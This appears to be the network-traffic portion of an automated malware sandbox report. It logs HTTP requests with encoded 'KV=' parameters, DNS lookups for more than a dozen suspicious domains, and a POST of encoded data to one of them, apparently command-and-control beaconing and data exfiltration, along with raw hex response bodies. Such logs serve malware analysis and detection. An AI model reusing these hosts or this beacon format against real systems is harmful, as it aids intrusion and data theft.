                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 15:56:00 GMTserver: Apacheset-cookie: __tad=1732118160.6524404; expires=Sat, 18-Nov-2034 15:56:00 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a7 08 b6 02 89 e5 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 d1 50 d7 96 51 d1 a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 58 e4 c7 70 54 78 e5 74 4f 40 fb 1e 45 4c 78 4f f9 ad dc ca 63 34 06 ef 94 88 f3 5b 9f d7 da ac d1 f5 4e 1b ca b5 ae 31 eb b4 c9 6e 7d 5c 16 f9 11 fb 56 aa 32 da 4a 07 0e 2b ed 50 d1 9f 56 9b 3b 10 90 34 44 fd 22 cf 77 bb 5d f6 4a 62 3e bf da 77 f9 e7 64 19 45 79 0e 37 48 20 81 74 87 76 43 60 6b 98 cf 66 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 0d 21 03 9f ea 80 ae 81 1a 84 17 f2 a1 77 b6 d3 9e 63 52 b7 1e 6a eb c0 db 0e 99 22 bd 35 51 bd 31 8a b4 35 7c dc b6 2b a9 ee ae c7 54 e9 14 1e a2 c9 4e 9b ca ee b2 d6 2a 19 50 99 c3 be 95 0a d3 7f 8c 9d 27 75 2f 2e ae 92 e9 32 3a 44 11 b9 7d 60 b2 4a 4f e0 2a f7 6b 34 21 c0 23 8d 9b f4 75 b5 0f c1 20 f3 27 a1 6b 75 ff 73 d4 2c e0 eb b3 93 ef 37 ac 43 56 e9 43 67 8d 26 cb a1 f5 22 c8 f6 78 08 cc 13 2b 9a 4c 32 6e 82 49 eb 1e 44 c9 d9 b2 35 b2 9d e9 29 ce 2f 13 87 7e d3 52 38 7f 80 b0 1f 0b bb a0 33 d8 49 ce 8f 88 6c ab 7d 28 f6 ad 5a 0e 30 d5 a2 7c b2 94 3e bb 9b 1e 4f df d7 ae 50 66 20 04 dd 07 60 ac 6a 52 74 6e e8 f8 ff df 61 e8 ea cb b9 a3 3d 8f 32 ac 6c c5 8d 86 80 5d 3b bb 31 d5 e2 ec 72 76 a9 e6 9f e0 00 8c 1e 40 4c 1b af c5 80 5e ad 95 6d ad 13 f1 59 3d ac 18 c2 d8 f2 76 36 2c 1e da a2 d2 5b 18 b8 22 a9 b4 67 f5 fb 05 18 6b 70 99 94 85 84 c6 61 2d de 1e e2 30 0e f3 a4 fc d2 6a 75 07 0d 3a 1c a6 d5 10 ba 22 97 7c 85 b8 08 97 32 76 b4 54 74 48 9c 9b b3 5e e0 df 8d de 8a 98 cb 70 fb 9b 18 78 8a 88 89 22 9e 2d e1 f7 f5 0f f1 ae d2 1f c3 35 3d 65 e7 1e 04 f3 43 2f c2 9f e2 11 93 b8 75 79 30 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7C-==rPQAZ,==f;\yMXpTxtO@ELxOc4[N1n}\V2J+PV;4D"w]Jb>wdEy7H tvC`kfiGeM,=!wcRj"5Q15|+TN*P'u/.2:D}`JO*k4!#u 'kus,7CVCg&"x+L2nID5)/~R83Il}(Z0|>OPf `jRtna=2l];1rv@L^mY=v6,["gkpa-0ju:"|2vTtH^px"-5=eC/uy0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 15:56:02 GMTserver: Apacheset-cookie: __tad=1732118162.4255567; expires=Sat, 18-Nov-2034 15:56:02 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a7 08 b6 02 89 e5 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 d1 50 d7 96 51 d1 a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 58 e4 c7 70 54 78 e5 74 4f 40 fb 1e 45 4c 78 4f f9 ad dc ca 63 34 06 ef 94 88 f3 5b 9f d7 da ac d1 f5 4e 1b ca b5 ae 31 eb b4 c9 6e 7d 5c 16 f9 11 fb 56 aa 32 da 4a 07 0e 2b ed 50 d1 9f 56 9b 3b 10 90 34 44 fd 22 cf 77 bb 5d f6 4a 62 3e bf da 77 f9 e7 64 19 45 79 0e 37 48 20 81 74 87 76 43 60 6b 98 cf 66 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 0d 21 03 9f ea 80 ae 81 1a 84 17 f2 a1 77 b6 d3 9e 63 52 b7 1e 6a eb c0 db 0e 99 22 bd 35 51 bd 31 8a b4 35 7c dc b6 2b a9 ee ae c7 54 e9 14 1e a2 c9 4e 9b ca ee b2 d6 2a 19 50 99 c3 be 95 0a d3 7f 8c 9d 27 75 2f 2e ae 92 e9 32 3a 44 11 b9 7d 60 b2 4a 4f e0 2a f7 6b 34 21 c0 23 8d 9b f4 75 b5 0f c1 20 f3 27 a1 6b 75 ff 73 d4 2c e0 eb b3 93 ef 37 ac 43 56 e9 43 67 8d 26 cb a1 f5 22 c8 f6 78 08 cc 13 2b 9a 4c 32 6e 82 49 eb 1e 44 c9 d9 b2 35 b2 9d e9 29 ce 2f 13 87 7e d3 52 38 7f 80 b0 1f 0b bb a0 33 d8 49 ce 8f 88 6c ab 7d 28 f6 ad 5a 0e 30 d5 a2 7c b2 94 3e bb 9b 1e 4f df d7 ae 50 66 20 04 dd 07 60 ac 6a 52 74 6e e8 f8 ff df 61 e8 ea cb b9 a3 3d 8f 32 ac 6c c5 8d 86 80 5d 3b bb 31 d5 e2 ec 72 76 a9 e6 9f e0 00 8c 1e 40 4c 1b af c5 80 5e ad 95 6d ad 13 f1 59 3d ac 18 c2 d8 f2 76 36 2c 1e da a2 d2 5b 18 b8 22 a9 b4 67 f5 fb 05 18 6b 70 99 94 85 84 c6 61 2d de 1e e2 30 0e f3 a4 fc d2 6a 75 07 0d 3a 1c a6 d5 10 ba 22 97 7c 85 b8 08 97 32 76 b4 54 74 48 9c 9b b3 5e e0 df 8d de 8a 98 cb 70 fb 9b 18 78 8a 88 89 22 9e 2d e1 f7 f5 0f f1 ae d2 1f c3 35 3d 65 e7 1e 04 f3 43 2f c2 9f e2 11 93 b8 75 79 30 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7C-==rPQAZ,==f;\yMXpTxtO@ELxOc4[N1n}\V2J+PV;4D"w]Jb>wdEy7H tvC`kfiGeM,=!wcRj"5Q15|+TN*P'u/.2:D}`JO*k4!#u 'kus,7CVCg&"x+L2nID5)/~R83Il}(Z0|>OPf `jRtna=2l];1rv@L^mY=v6,["gkpa-0ju:"|2vTtH^px"-5=eC/uy0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 15:56:05 GMTserver: Apacheset-cookie: __tad=1732118165.8770228; expires=Sat, 18-Nov-2034 15:56:05 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a7 08 b6 02 89 e5 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 d1 50 d7 96 51 d1 a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 58 e4 c7 70 54 78 e5 74 4f 40 fb 1e 45 4c 78 4f f9 ad dc ca 63 34 06 ef 94 88 f3 5b 9f d7 da ac d1 f5 4e 1b ca b5 ae 31 eb b4 c9 6e 7d 5c 16 f9 11 fb 56 aa 32 da 4a 07 0e 2b ed 50 d1 9f 56 9b 3b 10 90 34 44 fd 22 cf 77 bb 5d f6 4a 62 3e bf da 77 f9 e7 64 19 45 79 0e 37 48 20 81 74 87 76 43 60 6b 98 cf 66 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 0d 21 03 9f ea 80 ae 81 1a 84 17 f2 a1 77 b6 d3 9e 63 52 b7 1e 6a eb c0 db 0e 99 22 bd 35 51 bd 31 8a b4 35 7c dc b6 2b a9 ee ae c7 54 e9 14 1e a2 c9 4e 9b ca ee b2 d6 2a 19 50 99 c3 be 95 0a d3 7f 8c 9d 27 75 2f 2e ae 92 e9 32 3a 44 11 b9 7d 60 b2 4a 4f e0 2a f7 6b 34 21 c0 23 8d 9b f4 75 b5 0f c1 20 f3 27 a1 6b 75 ff 73 d4 2c e0 eb b3 93 ef 37 ac 43 56 e9 43 67 8d 26 cb a1 f5 22 c8 f6 78 08 cc 13 2b 9a 4c 32 6e 82 49 eb 1e 44 c9 d9 b2 35 b2 9d e9 29 ce 2f 13 87 7e d3 52 38 7f 80 b0 1f 0b bb a0 33 d8 49 ce 8f 88 6c ab 7d 28 f6 ad 5a 0e 30 d5 a2 7c b2 94 3e bb 9b 1e 4f df d7 ae 50 66 20 04 dd 07 60 ac 6a 52 74 6e e8 f8 ff df 61 e8 ea cb b9 a3 3d 8f 32 ac 6c c5 8d 86 80 5d 3b bb 31 d5 e2 ec 72 76 a9 e6 9f e0 00 8c 1e 40 4c 1b af c5 80 5e ad 95 6d ad 13 f1 59 3d ac 18 c2 d8 f2 76 36 2c 1e da a2 d2 5b 18 b8 22 a9 b4 67 f5 fb 05 18 6b 70 99 94 85 84 c6 61 2d de 1e e2 30 0e f3 a4 fc d2 6a 75 07 0d 3a 1c a6 d5 10 ba 22 97 7c 85 b8 08 97 32 76 b4 54 74 48 9c 9b b3 5e e0 df 8d de 8a 98 cb 70 fb 9b 18 78 8a 88 89 22 9e 2d e1 f7 f5 0f f1 ae d2 1f c3 35 3d 65 e7 1e 04 f3 43 2f c2 9f e2 11 93 b8 75 79 30 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7C-==rPQAZ,==f;\yMXpTxtO@ELxOc4[N1n}\V2J+PV;4D"w]Jb>wdEy7H tvC`kfiGeM,=!wcRj"5Q15|+TN*P'u/.2:D}`JO*k4!#u 'kus,7CVCg&"x+L2nID5)/~R83Il}(Z0|>OPf `jRtna=2l];1rv@L^mY=v6,["gkpa-0ju:"|2vTtH^px"-5=eC/uy0
                Source: global trafficHTTP traffic detected: GET /bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.duwixushx.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /od8t/?KV=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuEty+FSeypv/0YqJ9KzFrGa8mXVJ9lffIJok=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /i7qk/?KV=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImQ14HHScIWb6hMHv5+s8iUY9NL2Qo8ivIVjo=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.yvcp3.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rfhq/?KV=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBEiy3WEQe219nV0S5mknFQQ1hIDuAzNxIBCE=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.guacamask.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jt56/?KV=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wfRdswz4Mf7fkXLX0rdEfHuvF7ynYddkbc+A=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.supernutra01.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4bee/?KV=OWaLDb1Jm9p4bkDVec29BoDmBVET5eJeilgKnYToBBeYyiPSqC7oM1F3UnEyEVbrshSo8g4GkysDEHe9VbsXh/SWnXsZyYCMcK4IBi4/IwS5Oa2XQ2sC/aw=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bookingservice.centerConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /q6ws/?KV=2RCZf5GiD+fToLXcMHisxCqwWbc28bp5zmUuGnuHZcsPDzCWfzFSI1Df4pF2LDKbQ3OqnVWPrFqSO4182xFWIWWOBmKrBRiY7XTQRir+3P1LJShw3pPG+Dk=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.connecty.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.seeseye.websiteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mxde/?KV=8xKxkpsUUE6O2YGNwLnJ/+WM1qqfoI8NOsOkZIrS/NSsfWu+QjWct9+gZKiyGOAYB5Pljgx8M21MT9QArezJJe5Vce6MQIBegnnKKN1EkLTSu1v+eqsUQ+w=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bcg.servicesConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.aiactor.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /idu4/?KV=qD8cAnDgckBLYUQoRh7zBwgp4vAR8SH4vArrPOMmIDAln/sBv7g5z1sASbSU3sLbiWKHdb75VGXih9cbyGRF9rbA94O5jPyz1SB60B/cp/B1u7O6lua4pvo=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.76kdd.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /04wl/?KV=10FWZSQ9WPLVyv9qBMSr5p2LrQDaGm/mNCwAUqa3tlQsFj4tjY5WEjDNTnPsz2N9DzYKtSqEkqZ6JmaP68J/ydW7QnrBD/a7HdnFb2gh9G13RXTqS9Au/Yk=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.rafconstrutora.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /me88/?KV=q4gJP+3oagrN9CKx8rfxsUGQTP5gFdbCqSnsSAovlnmOs/6LoBJM5Gt+ZeI5OsVhXMd6KM7YnqTd6M8YysOllc/dqLONIyR3l/1k9rdJVwtuEJXWvL6OrMc=&Wno=a0qDq HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.614genetics.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: global trafficDNS traffic detected: DNS query: www.1qcczjvh2.autos
                Source: global trafficDNS traffic detected: DNS query: www.yvcp3.info
                Source: global trafficDNS traffic detected: DNS query: www.guacamask.online
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: global trafficDNS traffic detected: DNS query: www.bookingservice.center
                Source: global trafficDNS traffic detected: DNS query: www.connecty.live
                Source: global trafficDNS traffic detected: DNS query: www.seeseye.website
                Source: global trafficDNS traffic detected: DNS query: www.bcg.services
                Source: global trafficDNS traffic detected: DNS query: www.aiactor.xyz
                Source: global trafficDNS traffic detected: DNS query: www.76kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.rafconstrutora.online
                Source: global trafficDNS traffic detected: DNS query: www.614genetics.online
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: unknownHTTP traffic detected: POST /od8t/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.1qcczjvh2.autosConnection: closeContent-Length: 199Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.1qcczjvh2.autosReferer: http://www.1qcczjvh2.autos/od8t/User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36Data Raw: 4b 56 3d 65 55 34 42 51 56 6f 47 51 43 6e 4c 4d 71 6b 30 7a 49 52 30 68 69 2f 4d 6f 62 50 38 44 66 36 71 47 38 7a 76 4d 79 48 66 37 48 70 68 45 63 41 64 74 34 63 34 41 5a 71 75 6d 74 6d 47 56 44 34 75 31 41 30 2f 73 6a 71 37 48 76 49 4b 64 50 6b 63 4f 65 64 39 63 2b 43 31 53 6c 44 43 37 74 65 54 64 72 63 7a 43 41 4d 6b 4c 35 77 69 46 57 41 57 2b 4d 7a 38 4d 4f 6e 73 71 39 66 49 5a 2b 69 50 31 59 4a 30 32 67 57 68 42 4f 4d 64 46 75 66 56 67 73 36 73 52 67 5a 46 78 31 62 4d 5a 6f 79 78 30 39 4f 72 71 67 46 37 4c 65 63 5a 57 6b 36 35 45 78 6c 57 6a 6d 2b 50 70 50 45 55 6f 39 54 77 67 67 3d 3d Data Ascii: KV=eU4BQVoGQCnLMqk0zIR0hi/MobP8Df6qG8zvMyHf7HphEcAdt4c4AZqumtmGVD4u1A0/sjq7HvIKdPkcOed9c+C1SlDC7teTdrczCAMkL5wiFWAW+Mz8MOnsq9fIZ+iP1YJ02gWhBOMdFufVgs6sRgZFx1bMZoyx09OrqgF7LecZWk65ExlWjm+PpPEUo9Twgg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 15:54:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 20 Nov 2024 15:54:25 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 